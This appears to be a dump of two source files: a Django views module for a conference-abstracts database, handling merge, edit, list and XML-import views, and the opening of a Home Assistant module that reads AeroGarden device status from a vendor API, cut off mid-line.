form_valid(self, form): response = super(InstitutionCreate, self).form_valid(form) self.object.user_last_updated = self.request.user self.object.save() return response @user_is_staff @transaction.atomic def institution_merge(request, institution_id): institution = get_object_or_404(Institution, pk=institution_id) context = {"merging": institution, "institution_merge_form": InstitutionMergeForm} if request.method == "GET": return render(request, "institution_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = InstitutionMergeForm(request.POST) if raw_form.is_valid(): target_institution = raw_form.cleaned_data["into"] if institution == target_institution: """ If the user chooses the existing institution, don't merge, but instead error out. """ messages.error( request, f"You cannot merge an institution into itself. Please select a different institution.", ) return redirect("institution_merge", institution_id=institution_id) else: old_institution_id = str(institution) merge_results = institution.merge(target_institution) target_institution.user_last_updated = request.user target_institution.save() messages.success( request, f"Author {old_institution_id} has been merged into {target_institution}, and the old institution entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} affiliations updated" ) return redirect("institution_edit", pk=target_institution.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "institution_merge.html", context) @user_is_staff @transaction.atomic def institution_multi_merge(request): context = {"form": InstitutionMultiMergeForm} if request.method == "POST": raw_form = InstitutionMultiMergeForm(request.POST) if raw_form.is_valid(): target_institution = raw_form.cleaned_data["into"] source_institutions = raw_form.cleaned_data["sources"].exclude( 
pk=target_institution.pk ) for institution in source_institutions: old_institution_id = str(institution) merge_results = institution.merge(target_institution) target_institution.user_last_updated = request.user target_institution.save() messages.success( request, f"Institution {old_institution_id} has been merged into {target_institution}, and the old institution entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} institutions updated" ) return redirect("institution_edit", pk=target_institution.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "institution_multi_merge.html", context) class AffiliationEdit(LoginRequiredMixin, SuccessMessageMixin, UpdateView): model = Affiliation template_name = "generic_form.html" form_class = AffiliationEditForm extra_context = { "form_title": "Edit affiliation", "cancel_view": "full_institution_list", "merge_view": "affiliation_merge", } success_message = "%(department)s updated" success_url = reverse_lazy("full_institution_list") class AffiliationCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Affiliation template_name = "generic_form.html" form_class = AffiliationEditForm extra_context = { "form_title": "Create affiliation", "cancel_view": "full_institution_list", } success_message = "%(department)s created" success_url = reverse_lazy("full_institution_list") def get_initial(self, **kwargs): super().get_initial(**kwargs) if "institution" in self.request.GET: self.initial = {"institution": int(self.request.GET["institution"])} return self.initial @login_required def ajax_affiliation_create(request): newaff = Affiliation.objects.get_or_create( department=request.POST["department"], institution=Institution.objects.get(pk=int(request.POST["institution"])), )[0] return JsonResponse({"name": str(newaff), "id": newaff.pk}) @user_is_staff @transaction.atomic def affiliation_merge(request, affiliation_id): affiliation = 
get_object_or_404(Affiliation, pk=affiliation_id) context = {"merging": affiliation, "affiliation_merge_form": AffiliationMergeForm} if request.method == "GET": return render(request, "affiliation_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = AffiliationMergeForm(request.POST) if raw_form.is_valid(): target_affiliation = raw_form.cleaned_data["into"] if affiliation == target_affiliation: """ If the user chooses the existing affiliation, don't merge, but instead error out. """ messages.error( request, f"You cannot merge an affiliation into itself. Please select a different affiliation.", ) return redirect("affiliation_merge", affiliation_id=affiliation_id) else: old_affiliation_id = str(affiliation) merge_results = affiliation.merge(target_affiliation) messages.success( request, f"Affiliation {old_affiliation_id} has been merged into {target_affiliation}, and the old affiliation entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} affiliations updated" ) return redirect("affiliation_edit", pk=target_affiliation.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "affiliation_merge.html", context) @user_is_staff @transaction.atomic def affiliation_multi_merge(request): context = {"form": AffiliationMultiMergeForm} if request.method == "POST": raw_form = AffiliationMultiMergeForm(request.POST) if raw_form.is_valid(): target_affiliation = raw_form.cleaned_data["into"] source_affiliations = raw_form.cleaned_data["sources"].exclude( pk=target_affiliation.pk ) for affiliation in source_affiliations: old_affiliation_id = str(affiliation) merge_results = affiliation.merge(target_affiliation) messages.success( request, f"Affiliation {old_affiliation_id} has been merged into {target_affiliation}, and the old affiliation entry has been deleted.", ) messages.success( request, 
f"{merge_results['update_results']} affiliations updated" ) return redirect("affiliation_edit", pk=target_affiliation.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "affiliation_multi_merge.html", context) @user_is_staff @transaction.atomic def wipe_unused(request): deletion_dict = { "Author": Author.objects.exclude(authorships__isnull=False).distinct(), "Affiliation": Affiliation.objects.exclude( asserted_by__isnull=False ).distinct(), "Institution": Institution.objects.exclude( Q(affiliations__asserted_by__isnull=False) | Q(conferences__isnull=False) ).distinct(), "Keyword": Keyword.objects.exclude(works__isnull=False).distinct(), "Appellation": Appellation.objects.exclude( asserted_by__isnull=False ).distinct(), } if request.method == "POST": for k, v in deletion_dict.items(): res = v.delete() if res[0] > 0: messages.success(request, f"{k}: {res[0]} objects deleted") any_hanging_items = any([v.exists() for k, v in deletion_dict.items()]) context = {"deletions": deletion_dict, "hanging_items": any_hanging_items} return render(request, "wipe_unused.html", context) class ConferenceCreate(StaffRequiredMixin, SuccessMessageMixin, CreateView): model = Conference template_name = "conference_create.html" form_class = ConferenceForm extra_context = { "form_title": "Create conference", "cancel_view": "conference_list", } success_message = "Conference '%(year)s - %(short_title)s' created" @transaction.atomic def post(self, request, *args, **kwargs): response = super().post(request, *args, **kwargs) form_instance = self.get_form() if form_instance.is_valid(): for organizer in form_instance.cleaned_data["organizers"]: self.object.organizers.add(organizer) self.object.save() return response if "goto_abstracts" in request.POST: return redirect(reverse("work_list") + f"?conference={self.object.id}") else: for err in form_instance.errors: messages.error(request, err) return response @user_is_staff @transaction.atomic def 
def ConferenceEdit(request, pk):
    """Edit a Conference plus its series memberships (via an inline formset).

    Also supports bulk-setting or clearing the full-text license of every
    work in the conference through the form's `license_action` field.
    """
    conference = get_object_or_404(Conference, pk=pk)
    conference_dict = model_to_dict(conference)
    conference_dict["organizers"] = conference.organizers.all()
    form = ConferenceForm(initial=conference_dict)
    ConferenceSeriesFormSet = formset_factory(
        ConferenceSeriesInline, can_delete=True, extra=0
    )
    initial_series = [
        {"series": memb.series, "number": memb.number}
        for memb in SeriesMembership.objects.filter(conference=conference).all()
    ]
    context = {
        "conference": conference,
        "form": form,
        "series_membership_form": ConferenceSeriesFormSet(initial=initial_series),
        "form_title": "Edit conference",
        "cancel_view": "conference_list",
    }
    if request.method == "POST":
        form = ConferenceForm(data=request.POST, instance=conference)
        if form.is_valid():
            clean_form = form.cleaned_data
            conference.year = clean_form["year"]
            conference.short_title = clean_form["short_title"]
            conference.notes = clean_form["notes"]
            conference.url = clean_form["url"]
            # M2M fields are replaced wholesale: clear, then re-add.
            conference.organizers.clear()
            for organizer in clean_form["organizers"]:
                conference.organizers.add(organizer)
            conference.hosting_institutions.clear()
            for hosting_institution in clean_form["hosting_institutions"]:
                conference.hosting_institutions.add(hosting_institution)
            conference.save()
            # Bulk license handling: "" = leave untouched, "clear" = remove,
            # anything else is a License pk to apply to every work.
            license_action = clean_form["license_action"]
            if license_action == "":
                pass
            elif license_action == "clear":
                conference.works.all().update(full_text_license=None)
            else:
                license_object = License.objects.get(id=int(license_action))
                conference.works.all().update(full_text_license=license_object)
            series_forms = ConferenceSeriesFormSet(data=request.POST)
            if series_forms.is_valid():
                for d_form in series_forms.deleted_forms:
                    d_form_data = d_form.cleaned_data
                    SeriesMembership.objects.filter(
                        conference=conference,
                        series=d_form_data["series"],
                        number=d_form_data["number"],
                    ).delete()
                for s_form in series_forms.forms:
                    if s_form not in series_forms.deleted_forms:
                        s_form_data = s_form.cleaned_data
                        SeriesMembership.objects.update_or_create(
                            conference=conference,
                            series=s_form_data["series"],
                            defaults={"number": s_form_data["number"]},
                        )
                messages.success(request, f"Conference {conference} updated.")
                if "goto_abstracts" in request.POST:
                    return redirect(
                        reverse("work_list") + f"?conference={conference.id}"
                    )
                if "goto_series" in request.POST:
                    first_series = conference.series.first()
                    if first_series is None:
                        return redirect("standalone_conferences")
                    else:
                        return redirect("conference_series_detail", pk=first_series.id)
                return redirect("conference_edit", pk=conference.pk)
            else:
                for f, e in series_forms.errors.items():
                    messages.error(request, f"{f}: {e}")
        else:
            for f, e in form.errors.items():
                messages.error(request, f"{f}: {e}")
    return render(request, "conference_edit.html", context)


class ConferenceDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView):
    """Confirm-and-delete view for a Conference."""

    model = Conference
    template_name = "conference_delete.html"
    extra_context = {
        "form_title": "Delete conference",
        "cancel_view": "conference_list",
    }
    success_message = "Conference deleted"
    success_url = reverse_lazy("conference_list")

    def delete(self, request, *args, **kwargs):
        # DeleteView does not run SuccessMessageMixin on delete(); emit manually.
        messages.success(self.request, self.success_message)
        return super(ConferenceDelete, self).delete(request, *args, **kwargs)


class ConferenceXMLLoad(StaffRequiredMixin, DetailView):
    """Upload a zip of TEI XML files and import them into this conference."""

    model = Conference
    template_name = "conference_xml_load.html"
    extra_context = {"form": ConferenceXMLUploadForm()}

    @transaction.atomic
    def post(self, request, *args, **kwargs):
        raw_form = ConferenceXMLUploadForm(request.POST, request.FILES)
        conference = self.get_object()
        if raw_form.is_valid():
            with TemporaryDirectory() as upload_dir:
                # Stream the uploaded zip to disk before validating it.
                with NamedTemporaryFile(dir=upload_dir, suffix=".zip") as tei_zip:
                    with open(tei_zip.name, "wb") as upload_zip:
                        for chunk in request.FILES["file"]:
                            upload_zip.write(chunk)
                    if not zipfile.is_zipfile(tei_zip.name):
                        messages.error(request, "That is not a valid zipfile.")
ConferenceXMLUploadForm(), }, ) with zipfile.ZipFile(tei_zip.name) as zip_ref: zip_ref.extractall(upload_dir) import_results = conference.import_xml_directory(upload_dir) n_success = len(import_results["successful_files"]) n_failed = len(import_results["failed_files"]) messages.info( request, f"{n_success} of {n_success + n_failed} files valid.", ) for err in import_results["failed_files"]: messages.error( request, f"{basename(err['filepath'])}: {err['error']}" ) if n_failed == 0: messages.success(request, f"All files imported successfully.") else: messages.info( request, "Please fix errors or remove malformed files, and re-upload zip. All TEI documents must be valid in order to complete the import.", ) return render( request, "conference_xml_load.html", {"object": self.get_object(), "form": ConferenceXMLUploadForm()}, ) else: for f, e in raw_form.errors.items(): messages.error(request, f"{f}: {e}") return render( request, "conference_xml_load.html", {"object": self.get_object(), "form": ConferenceXMLUploadForm()}, ) @login_required @transaction.atomic def conference_checkout(request, conference_id): conference = get_object_or_404(Conference, pk=conference_id) if request.method == "GET": context = { "conference": conference, "form": ConferenceCheckoutForm( {"entry_status": conference.entry_status, "editing_user": "self"} ), } return render(request, "conference_checkout.html", context) elif request.method == "POST": """ Get the form and update the status if the user has the authority to do so """ raw_form = ConferenceCheckoutForm(request.POST) if raw_form.is_valid(): clean_form = raw_form.cleaned_data if clean_form["entry_status"] == "c" and not request.user.is_staff: messages.error( request, "Only an administrator can mark this conference as completed.", ) return redirect("conference_checkout", conference_id=conference.id) else: if clean_form["assign_user"] == "self": conference.entry_status = clean_form["entry_status"] conference.editing_user = request.user 
conference.save() messages.success(request, "Conference checked out") elif clean_form["assign_user"] == "clear": conference.entry_status = clean_form["entry_status"] conference.editing_user = None conference.save() messages.success(request, "Conference cleared") return redirect(reverse("work_list") + f"?conference={conference.id}") class SeriesCreate(StaffRequiredMixin, SuccessMessageMixin, CreateView): model = ConferenceSeries template_name = "generic_form.html" extra_context = { "form_title": "Create conference series", "cancel_view": "conference_list", } fields = ["title", "abbreviation", "notes"] success_message = "Series '%(title)s' created" success_url = reverse_lazy("conference_list") class SeriesEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = ConferenceSeries template_name = "generic_form.html" extra_context = { "form_title": "Update conference series", "cancel_view": "conference_list", } fields = ["title", "abbreviation", "notes"] success_message = "Series '%(title)s' updated" success_url = reverse_lazy("conference_list") class SeriesDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = ConferenceSeries template_name = "generic_form.html" extra_context = { "form_title": "Delete conference series", "cancel_view": "conference_list", } success_message = "Series '%(title)s' deleted" success_url = reverse_lazy("conference_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(SeriesDelete, self).delete(request, *args, **kwargs) class OrganizerCreate(StaffRequiredMixin, SuccessMessageMixin, CreateView): model = Organizer template_name = "generic_form.html" extra_context = { "form_title": "Create conference organizer", "cancel_view": "full_organizer_list", } fields = ["name", "abbreviation", "conferences_organized", "notes", "url"] success_message = "Organizer '%(name)s' created" success_url = reverse_lazy("full_organizer_list") def form_valid(self, form): response = 
super(OrganizerCreate, self).form_valid(form) self.object.user_last_updated = self.request.user self.object.save() return response class OrganizerEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = Organizer template_name = "generic_form.html" extra_context = { "form_title": "Update conference organizer", "cancel_view": "full_organizer_list", } fields = ["name", "abbreviation", "conferences_organized", "notes", "url"] success_message = "Organizer '%(name)s' updated" success_url = reverse_lazy("full_organizer_list") def form_valid(self, form): response = super(OrganizerEdit, self).form_valid(form) self.object.user_last_updated = self.request.user self.object.save() return response class OrganizerDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = Organizer template_name = "generic_form.html" extra_context = { "form_title": "Delete organizer", "cancel_view": "full_organizer_list", } success_message = "Organizer %(name)s deleted." success_url = reverse_lazy("full_organizer_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(OrganizerDelete, self).delete(request, *args, **kwargs) class OrganizerList(LoginRequiredMixin, ListView): model = Organizer template_name = "full_organizer_list.html" context_object_name = "organizer_list" class KeywordCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Keyword template_name = "generic_form.html" extra_context = {"form_title": "Create keyword", "cancel_view": "full_keyword_list"} fields = ["title"] success_message = "Keyword '%(title)s' created" success_url = reverse_lazy("full_keyword_list") class KeywordDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = Keyword template_name = "generic_form.html" extra_context = {"form_title": "Delete keyword", "cancel_view": "full_keyword_list"} success_message = "Keyword '%(title)s' deleted" success_url = reverse_lazy("full_keyword_list") def delete(self, request, 
*args, **kwargs): messages.success(self.request, self.success_message) return super(KeywordDelete, self).delete(request, *args, **kwargs) class KeywordEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = Keyword template_name = "generic_form.html" extra_context = { "form_title": "Update keyword", "cancel_view": "full_keyword_list", "merge_view": "keyword_merge", "delete_view": "keyword_delete", } fields = ["title"] success_message = "Keyword '%(title)s' updated" success_url = reverse_lazy("full_keyword_list") class KeywordList(LoginRequiredMixin, ListView): model = Keyword template_name = "tag_list.html" context_object_name = "tag_list" extra_context = { "tag_category": "Keywords", "tag_edit_view": "keyword_edit", "tag_create_view": "keyword_create", "tag_list_view": "full_keyword_list", "multi_merge": "keyword_multi_merge", "filter_param_name": "keywords", } def get_queryset(self): base_results_set = Keyword.objects.order_by("title") results_set = base_results_set.annotate(n_works=Count("works")) if self.request.GET: raw_filter_form = TagForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data if filter_form["name"] != "": results_set = results_set.filter( title__icontains=filter_form["name"] ) if filter_form["ordering"] == "a": results_set = results_set.order_by("title") elif filter_form["ordering"] == "n_asc": results_set = results_set.order_by("n_works") elif filter_form["ordering"] == "n_dsc": results_set = results_set.order_by("-n_works") else: for f, e in raw_filter_form.errors.items(): messages.error(self.request, f"{f}: {e}") else: results_set = results_set.order_by("title") return results_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["tag_filter_form"] = TagForm(initial=self.request.GET) context["filtered_tags_count"] = self.get_queryset().count() context["available_tags_count"] = Keyword.objects.count() return context @user_is_staff @transaction.atomic 
def keyword_merge(request, keyword_id): keyword = get_object_or_404(Keyword, pk=keyword_id) affected_works = Work.objects.filter(keywords=keyword).all() sample_works = affected_works[:15] count_elements = affected_works.count() - 15 context = { "merging": keyword, "tag_merge_form": KeywordMergeForm, "sample_elements": sample_works, "tag_category": "Keyword", "merge_view": "keyword_merge", } if request.method == "GET": return render(request, "tag_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = KeywordMergeForm(request.POST) if raw_form.is_valid(): target_keyword = raw_form.cleaned_data["into"] if keyword == target_keyword: """ If the user chooses the existing keyword, don't merge, but instead error out. """ messages.error( request, f"You cannot merge a keyword into itself. Please select a different keyword.", ) return redirect("keyword_merge", keyword_id=keyword_id) else: old_keyword_id = str(keyword) merge_results = keyword.merge(target_keyword) messages.success( request, f"Keyword {old_keyword_id} has been merged into {target_keyword}, and the old keyword entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} keywords updated" ) return redirect("keyword_edit", pk=target_keyword.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_merge.html", context) @user_is_staff @transaction.atomic def keyword_multi_merge(request): context = { "tag_merge_form": KeywordMultiMergeForm, "tag_category": "Keyword", "multi_merge_view": "keyword_multi_merge", } if request.method == "POST": raw_form = KeywordMultiMergeForm(request.POST) if raw_form.is_valid(): target_keyword = raw_form.cleaned_data["into"] source_keywords = raw_form.cleaned_data["sources"].exclude( pk=target_keyword.pk ) for keyword in source_keywords: old_keyword_id = keyword.title merge_results = keyword.merge(target_keyword) 
messages.success( request, f"Keyword {old_keyword_id} has been merged into {target_keyword}, and the old keyword entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} keywords updated" ) return redirect("keyword_edit", pk=target_keyword.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_multi_merge.html", context) class TopicCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Topic template_name = "generic_form.html" extra_context = {"form_title": "Create topic", "cancel_view": "full_topic_list"} fields = ["title"] success_message = "Topic '%(title)s' created" success_url = reverse_lazy("full_topic_list") class TopicDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = Topic template_name = "generic_form.html" extra_context = {"form_title": "Delete topic", "cancel_view": "full_topic_list"} success_message = "Topic '%(title)s' deleted" success_url = reverse_lazy("full_topic_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(TopicDelete, self).delete(request, *args, **kwargs) class TopicEdit(LoginRequiredMixin, SuccessMessageMixin, UpdateView): model = Topic template_name = "generic_form.html" extra_context = { "form_title": "Update topic", "cancel_view": "full_topic_list", "merge_view": "topic_merge", "delete_view": "topic_delete", } fields = ["title"] success_message = "Topic '%(title)s' updated" success_url = reverse_lazy("full_topic_list") class TopicList(LoginRequiredMixin, ListView): model = Topic template_name = "tag_list.html" context_object_name = "tag_list" extra_context = { "tag_category": "Topics", "tag_edit_view": "topic_edit", "tag_create_view": "topic_create", "tag_filter_form": TagForm, "tag_list_view": "full_topic_list", "multi_merge": "topic_multi_merge", "filter_param_name": "topics", } def get_queryset(self): base_results_set = Topic.objects.order_by("title") 
results_set = base_results_set.annotate(n_works=Count("works")) raw_filter_form = TagForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data if filter_form["name"] != "": results_set = results_set.filter(title__icontains=filter_form["name"]) if filter_form["ordering"] == "a": results_set = results_set.order_by("title") elif filter_form["ordering"] == "n_asc": results_set = results_set.order_by("n_works") elif filter_form["ordering"] == "n_dsc": results_set = results_set.order_by("-n_works") return results_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["filtered_tags_count"] = self.get_queryset().count() context["available_tags_count"] = Topic.objects.count() return context @user_is_staff @transaction.atomic def topic_merge(request, topic_id): topic = get_object_or_404(Topic, pk=topic_id) affected_elements = topic.works.all() count_elements = affected_elements.count() - 10 sample_elements = affected_elements[:10] context = { "merging": topic, "tag_merge_form": TopicMergeForm, "tag_category": "Topic", "merge_view": "topic_merge", "sample_elements": sample_elements, "count_elements": count_elements, } if request.method == "GET": return render(request, "tag_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = TopicMergeForm(request.POST) if raw_form.is_valid(): target_topic = raw_form.cleaned_data["into"] if topic == target_topic: """ If the user chooses the existing topic, don't merge, but instead error out. """ messages.error( request, f"You cannot merge a topic into itself. 
Please select a different topic.", ) return redirect("topic_merge", topic_id=topic_id) else: old_topic_id = str(topic) merge_results = topic.merge(target_topic) messages.success( request, f"Topic {old_topic_id} has been merged into {target_topic}, and the old topic entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} topics updated" ) return redirect("topic_edit", pk=target_topic.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_merge.html", context) @user_is_staff @transaction.atomic def topic_multi_merge(request): context = { "tag_merge_form": TopicMultiMergeForm, "tag_category": "Topic", "multi_merge_view": "topic_multi_merge", } if request.method == "POST": raw_form = TopicMultiMergeForm(request.POST) if raw_form.is_valid(): target_topic = raw_form.cleaned_data["into"] source_topics = raw_form.cleaned_data["sources"].exclude(pk=target_topic.pk) for topic in source_topics: old_topic_id = topic.title merge_results = topic.merge(target_topic) messages.success( request, f"Topic {old_topic_id} has been merged into {target_topic}, and the old topic entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} topics updated" ) return redirect("topic_edit", pk=target_topic.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_multi_merge.html", context) class LanguageCreate(LoginRequiredMixin, SuccessMessageMixin, CreateView): model = Language template_name = "generic_form.html" extra_context = { "form_title": "Create language", "cancel_view": "full_language_list", } fields = ["title", "code"] success_message = "Language '%(title)s' created" success_url = reverse_lazy("full_language_list") class LanguageDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = Language template_name = "generic_form.html" extra_context = { "form_title": "Delete language", "cancel_view": "full_language_list", } 
success_message = "Language '%(title)s' deleted" success_url = reverse_lazy("full_language_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(LanguageDelete, self).delete(request, *args, **kwargs) class LanguageEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = Language template_name = "generic_form.html" extra_context = { "form_title": "Update language", "cancel_view": "full_language_list", "merge_view": "language_merge", "delete_view": "language_delete", } fields = ["title", "code"] success_message = "Language '%(title)s' updated" success_url = reverse_lazy("full_language_list") class LanguageList(LoginRequiredMixin, ListView): model = Language template_name = "tag_list.html" context_object_name = "tag_list" extra_context = { "tag_category": "Languages", "tag_edit_view": "language_edit", "tag_create_view": "language_create", "tag_filter_form": TagForm, "tag_list_view": "full_language_list", "filter_param_name": "languages", } def get_queryset(self): base_results_set = Language.objects.order_by("title") results_set = base_results_set.annotate(n_works=Count("works")) raw_filter_form = TagForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data if filter_form["name"] != "": results_set = results_set.filter(title__icontains=filter_form["name"]) if filter_form["ordering"] == "a": results_set = results_set.order_by("title") elif filter_form["ordering"] == "n_asc": results_set = results_set.order_by("n_works") elif filter_form["ordering"] == "n_dsc": results_set = results_set.order_by("-n_works") return results_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["filtered_tags_count"] = self.get_queryset().count() context["available_tags_count"] = Language.objects.count() return context @user_is_staff @transaction.atomic def language_merge(request, language_id): language = get_object_or_404(Language, 
pk=language_id) affected_elements = language.works.all() count_elements = affected_elements.count() - 10 sample_elements = affected_elements[:10] context = { "merging": language, "tag_merge_form": LanguageMergeForm, "tag_category": "Language", "merge_view": "language_merge", "sample_elements": sample_elements, "count_elements": count_elements, } if request.method == "GET": return render(request, "tag_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = LanguageMergeForm(request.POST) if raw_form.is_valid(): target_language = raw_form.cleaned_data["into"] if language == target_language: """ If the user chooses the existing language, don't merge, but instead error out. """ messages.error( request, f"You cannot merge a language into itself. Please select a different language.", ) return redirect("language_merge", language_id=language_id) else: old_language_id = str(language) merge_results = language.merge(target_language) messages.success( request, f"Language {old_language_id} has been merged into {target_language}, and the old language entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} languages updated" ) return redirect("language_edit", pk=target_language.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_merge.html", context) class WorkTypeCreate(StaffRequiredMixin, SuccessMessageMixin, CreateView): model = WorkType template_name = "generic_form.html" extra_context = { "form_title": "Create work_type", "cancel_view": "full_work_type_list", } fields = ["title", "is_parent"] success_message = "Abstract type '%(title)s' created" success_url = reverse_lazy("full_work_type_list") class WorkTypeDelete(StaffRequiredMixin, SuccessMessageMixin, DeleteView): model = WorkType template_name = "generic_form.html" extra_context = { "form_title": "Delete work_type", "cancel_view": 
"full_work_type_list", } success_message = "Abstract type '%(title)s' deleted" success_url = reverse_lazy("full_work_type_list") def delete(self, request, *args, **kwargs): messages.success(self.request, self.success_message) return super(WorkTypeDelete, self).delete(request, *args, **kwargs) class WorkTypeEdit(StaffRequiredMixin, SuccessMessageMixin, UpdateView): model = WorkType template_name = "generic_form.html" extra_context = { "form_title": "Update abstract type", "cancel_view": "full_work_type_list", "merge_view": "work_type_merge", "delete_view": "work_type_delete", } fields = ["title", "is_parent"] success_message = "Abstract '%(title)s' updated" success_url = reverse_lazy("full_work_type_list") class WorkTypeList(LoginRequiredMixin, ListView): model = WorkType template_name = "tag_list.html" context_object_name = "tag_list" extra_context = { "tag_category": "Abstract Types", "tag_edit_view": "work_type_edit", "tag_create_view": "work_type_create", "tag_filter_form": TagForm, "tag_list_view": "full_work_type_list", "filter_param_name": "work_type", } def get_queryset(self): base_results_set = WorkType.objects.order_by("title") results_set = base_results_set.annotate(n_works=Count("works")) raw_filter_form = TagForm(self.request.GET) if raw_filter_form.is_valid(): filter_form = raw_filter_form.cleaned_data if filter_form["name"] != "": results_set = results_set.filter(title__icontains=filter_form["name"]) if filter_form["ordering"] == "a": results_set = results_set.order_by("title") elif filter_form["ordering"] == "n_asc": results_set = results_set.order_by("n_works") elif filter_form["ordering"] == "n_dsc": results_set = results_set.order_by("-n_works") return results_set def get_context_data(self, **kwargs): context = super().get_context_data(**kwargs) context["filtered_tags_count"] = self.get_queryset().count() context["available_tags_count"] = WorkType.objects.count() return context @user_is_staff @transaction.atomic def work_type_merge(request, 
work_type_id): work_type = get_object_or_404(WorkType, pk=work_type_id) affected_elements = work_type.works.all() count_elements = affected_elements.count() - 10 sample_elements = affected_elements[:10] context = { "merging": work_type, "tag_merge_form": WorkTypeMergeForm, "tag_category": "Abstract Type", "merge_view": "work_type_merge", "sample_elements": sample_elements, "count_elements": count_elements, } if request.method == "GET": return render(request, "tag_merge.html", context) elif request.method == "POST": """ Posting the new author id causes all of the old author's authorships to be reassigned. """ raw_form = WorkTypeMergeForm(request.POST) if raw_form.is_valid(): target_work_type = raw_form.cleaned_data["into"] if work_type == target_work_type: """ If the user chooses the existing work_type, don't merge, but instead error out. """ messages.error( request, f"You cannot merge a work_type into itself. Please select a different work_type.", ) return redirect("work_type_merge", work_type_id=work_type_id) else: old_work_type_id = str(work_type) merge_results = work_type.merge(target_work_type) messages.success( request, f"WorkType {old_work_type_id} has been merged into {target_work_type}, and the old work_type entry has been deleted.", ) messages.success( request, f"{merge_results['update_results']} work_types updated" ) return redirect("work_type_edit", pk=target_work_type.pk) else: for error in raw_form.errors: messages.error(request, error) return render(request, "tag_merge.html", context)
true
true
f705eac2506b58ebfbb78d7b784fcf08c2440c41
4,823
py
Python
Aero_Garden.py
epotex/hagarden
da1aad8f7aa26a8fa0d13738bd124a8aa27319c5
[ "MIT" ]
2
2018-02-05T21:29:44.000Z
2021-12-13T16:38:24.000Z
Aero_Garden.py
epotex/hagarden
da1aad8f7aa26a8fa0d13738bd124a8aa27319c5
[ "MIT" ]
null
null
null
Aero_Garden.py
epotex/hagarden
da1aad8f7aa26a8fa0d13738bd124a8aa27319c5
[ "MIT" ]
2
2018-01-20T04:50:24.000Z
2020-01-20T18:53:27.000Z
import logging import urllib import requests import base64 """ HASS module to read Aerogarde bounty info, later there will be an option to control the light writen by @epotex """ _LOGGER = logging.getLogger(__name__) DOMAIN = 'aerogarden' agent = "BountyWiFi/1.1.13 (iPhone; iOS 10.3.2; Scale/2.00)" port = "8080" host = "http://ec2-54-86-39-88.compute-1.amazonaws.com:" #API Calls Login_call = "/api/Admin/Login" SetDictPushCount = "/api/CustomData/SetDictPushCount?userID=" QueryUserDevice = "/api/CustomData/QueryUserDevice" GetUserSetted = "/api/CustomData/GetUserSetted" QueryDeviceOnline = "/api/CustomData/QueryDeviceOnline" QueryDeviceStatus = "/api/CustomData/QueryDeviceStatus" UpdateDeviceConfig ="/api/CustomData/UpdateDeviceConfig" auth_data ="" encoded_mac = "" AERO_PARAMETERS = {} def base64decode(b): return base64.b64decode(b).decode('utf-8') def setup(hass, base_config): config = base_config.get(DOMAIN) encoded_email = urllib.parse.quote(config['mail']) encoded_password = urllib.parse.quote(config['password']) encoded_mac = urllib.parse.quote(config['aerogarden_mac_address']) auth_data = "mail=" + encoded_email + "&userPwd=" + encoded_password apiurl = str(host) + str(port) + str(Login_call) headers = { 'User-Agent': 'BountyWiFi/1.1.13 (iPhone; iOS 10.3.2; Scale/2.00)', "Content-Type": "application/x-www-form-urlencoded", "Connection": "keep-alive", "Accept": "*/*", "Accept-Encoding": "gzip, deflate" } try: r = requests.post(apiurl, data=auth_data, headers=headers) responce = r.json() userID =responce["code"] device_url = "airGuid=" + encoded_mac + "&userID=" + str(userID) apiurl = str(host) + str(port) + str(QueryDeviceStatus) r = requests.post(apiurl, data=str(device_url), headers=headers) garden_data = r.json() status = 'online' #extracted info config_id= garden_data['configID'] airGuid = garden_data['airGuid'] lightCycle = garden_data['lightCycle'] pumpCycle = garden_data['pumpCycle'] lightTemp = garden_data['lightTemp'] lightStat = 
